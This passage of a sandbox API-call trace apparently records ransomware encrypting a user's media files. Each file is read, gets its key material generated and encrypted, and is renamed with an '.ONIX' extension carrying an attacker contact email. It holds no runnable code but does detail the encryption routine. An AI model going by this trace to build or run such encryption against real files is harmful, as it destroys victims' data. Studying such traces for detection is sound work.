lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.499] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.500] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.501] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5f2c) returned 0x4e1b68 [0129.501] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5f2c) returned 0xf70048 [0129.501] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.501] ReadFile (in: hFile=0x528, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x5f2c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x5f2c, lpOverlapped=0x0) returned 1 [0129.503] UnlockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x5f2c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.503] CloseHandle (hObject=0x528) returned 1 [0129.504] GetProcessHeap () returned 0x410000 [0129.504] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.504] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-AkN3KLFspX.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\-akn3klfspx.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-AkN3KLFspX.jpg.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\-akn3klfspx.jpg.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.507] GetProcessHeap () returned 0x410000 [0129.507] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.507] FindNextFileW (in: hFindFile=0x4e0e80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b3772d0, ftCreationTime.dwHighDateTime=0x1d5dfb1, ftLastAccessTime.dwLowDateTime=0xe67e42e0, ftLastAccessTime.dwHighDateTime=0x1d5ddae, ftLastWriteTime.dwLowDateTime=0xe67e42e0, ftLastWriteTime.dwHighDateTime=0x1d5ddae, nFileSizeHigh=0x0, nFileSizeLow=0xcdf9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-v1RCeCZWVp4f8.mp3", cAlternateFileName="-V1RCE~1.MP3")) returned 1 [0129.507] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-v1RCeCZWVp4f8.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\-v1rceczwvp4f8.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x528 [0129.507] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.507] LockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xcdf9, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.507] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.507] ReadFile (in: hFile=0x528, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.508] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.508] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.508] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.508] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.508] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-v1RCeCZWVp4f8.mp3", dwFileAttributes=0x80) returned 1 [0129.509] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-v1RCeCZWVp4f8.mp3") returned 68 [0129.509] GetProcessHeap () returned 0x410000 [0129.509] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf8) returned 0x431d68 [0129.509] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-v1RCeCZWVp4f8.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-v1RCeCZWVp4f8.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-v1RCeCZWVp4f8.mp3" [0129.509] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-v1RCeCZWVp4f8.mp3", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-v1RCeCZWVp4f8.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-v1RCeCZWVp4f8.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.509] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=52729) returned 1 [0129.509] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xcdf9 [0129.509] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.509] GetProcessHeap () returned 0x410000 [0129.509] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.509] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.509] WriteFile (in: hFile=0x528, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.511] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.512] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.515] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xcdf9) returned 0xf70048 [0129.516] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xcdf9) returned 0xf7ce50 [0129.516] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.516] ReadFile (in: hFile=0x528, lpBuffer=0xf70048, nNumberOfBytesToRead=0xcdf9, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0xcdf9, lpOverlapped=0x0) returned 1 [0129.518] UnlockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xcdf9, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.518] CloseHandle (hObject=0x528) returned 1 [0129.519] GetProcessHeap () returned 0x410000 [0129.519] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.519] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-v1RCeCZWVp4f8.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\-v1rceczwvp4f8.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\-v1RCeCZWVp4f8.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\-v1rceczwvp4f8.mp3.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.522] GetProcessHeap () returned 0x410000 [0129.522] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.522] FindNextFileW (in: hFindFile=0x4e0e80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16141ef0, ftCreationTime.dwHighDateTime=0x1d5e7b2, ftLastAccessTime.dwLowDateTime=0xa0893eb0, ftLastAccessTime.dwHighDateTime=0x1d5e485, ftLastWriteTime.dwLowDateTime=0xa0893eb0, ftLastWriteTime.dwHighDateTime=0x1d5e485, nFileSizeHigh=0x0, nFileSizeLow=0xef30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="92KuOx-fSV_as7L.mp4", cAlternateFileName="92KUOX~1.MP4")) returned 1 [0129.522] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\92KuOx-fSV_as7L.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\92kuox-fsv_as7l.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x528 [0129.522] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.522] LockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xef30, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.522] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.522] ReadFile (in: hFile=0x528, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.523] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.523] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.523] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.523] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.523] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\92KuOx-fSV_as7L.mp4", dwFileAttributes=0x80) returned 1 [0129.524] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\92KuOx-fSV_as7L.mp4") returned 69 [0129.524] GetProcessHeap () returned 0x410000 [0129.524] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xfa) returned 0x4d8e98 [0129.524] lstrcpyW (in: lpString1=0x4d8e98, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\92KuOx-fSV_as7L.mp4" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\92KuOx-fSV_as7L.mp4") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\92KuOx-fSV_as7L.mp4" [0129.524] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\92KuOx-fSV_as7L.mp4", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\92KuOx-fSV_as7L.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\92KuOx-fSV_as7L.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.524] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=61232) returned 1 [0129.524] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xef30 [0129.524] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.524] GetProcessHeap () returned 0x410000 [0129.524] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8fa0 [0129.524] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8fa0*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8fa0*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.524] WriteFile (in: hFile=0x528, lpBuffer=0x4d8fa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8fa0*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.526] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.527] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.528] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xef30) returned 0xf70048 [0129.529] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xef30) returned 0xf7ef80 [0129.529] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.529] ReadFile (in: hFile=0x528, lpBuffer=0xf70048, nNumberOfBytesToRead=0xef30, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0xef30, lpOverlapped=0x0) returned 1 [0129.532] UnlockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xef30, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.532] CloseHandle (hObject=0x528) returned 1 [0129.533] GetProcessHeap () returned 0x410000 [0129.533] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8fa0 | out: hHeap=0x410000) returned 1 [0129.533] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\92KuOx-fSV_as7L.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\92kuox-fsv_as7l.mp4"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\92KuOx-fSV_as7L.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\92kuox-fsv_as7l.mp4.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.536] GetProcessHeap () returned 0x410000 [0129.536] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.536] FindNextFileW (in: hFindFile=0x4e0e80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc35f9a70, ftCreationTime.dwHighDateTime=0x1d5dee4, ftLastAccessTime.dwLowDateTime=0x4510eb20, ftLastAccessTime.dwHighDateTime=0x1d5de34, ftLastWriteTime.dwLowDateTime=0x4510eb20, ftLastWriteTime.dwHighDateTime=0x1d5de34, nFileSizeHigh=0x0, nFileSizeLow=0x42eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D6ZGIRfoyZ.mkv", cAlternateFileName="D6ZGIR~1.MKV")) returned 1 [0129.536] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\D6ZGIRfoyZ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\d6zgirfoyz.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x528 [0129.536] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.537] LockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x42eb, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.537] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.537] ReadFile (in: hFile=0x528, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.537] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.538] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.538] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.538] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.538] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\D6ZGIRfoyZ.mkv", dwFileAttributes=0x80) returned 1 [0129.538] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\D6ZGIRfoyZ.mkv") returned 64 [0129.538] GetProcessHeap () returned 0x410000 [0129.538] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf0) returned 0x431d68 [0129.538] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\D6ZGIRfoyZ.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\D6ZGIRfoyZ.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\D6ZGIRfoyZ.mkv" [0129.538] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\D6ZGIRfoyZ.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\D6ZGIRfoyZ.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\D6ZGIRfoyZ.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.538] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=17131) returned 1 [0129.538] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x42eb [0129.538] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.538] GetProcessHeap () returned 0x410000 [0129.538] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.538] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.539] WriteFile (in: hFile=0x528, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.540] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.541] WriteFile (in: hFile=0x528, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.542] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x42eb) returned 0x4e1b68 [0129.542] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x42eb) returned 0xf70048 [0129.542] SetFilePointer (in: hFile=0x528, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.542] ReadFile (in: hFile=0x528, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x42eb, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x42eb, lpOverlapped=0x0) returned 1 [0129.544] UnlockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x42eb, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.544] CloseHandle (hObject=0x528) returned 1 [0129.545] GetProcessHeap () returned 0x410000 [0129.545] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.545] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\D6ZGIRfoyZ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\d6zgirfoyz.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\D6ZGIRfoyZ.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\d6zgirfoyz.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.548] GetProcessHeap () returned 0x410000 [0129.548] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.548] FindNextFileW (in: hFindFile=0x4e0e80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2432400, ftCreationTime.dwHighDateTime=0x1d5d9d3, ftLastAccessTime.dwLowDateTime=0x97ca5220, ftLastAccessTime.dwHighDateTime=0x1d5e5c3, ftLastWriteTime.dwLowDateTime=0x97ca5220, ftLastWriteTime.dwHighDateTime=0x1d5e5c3, nFileSizeHigh=0x0, nFileSizeLow=0x4c2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dNqvQ4mjZOLsWZUsoO.flv", cAlternateFileName="DNQVQ4~1.FLV")) returned 1 [0129.548] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJ-RJfDr8K\\dNqvQ4mjZOLsWZUsoO.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xj-rjfdr8k\\dnqvq4mjzolswzusoo.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x528 [0129.548] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.548] LockFile (hFile=0x528, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4c2a, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.548] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.548] ReadFile (in: hFile=0x528, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.549] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.549] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.549] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.549] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.549] 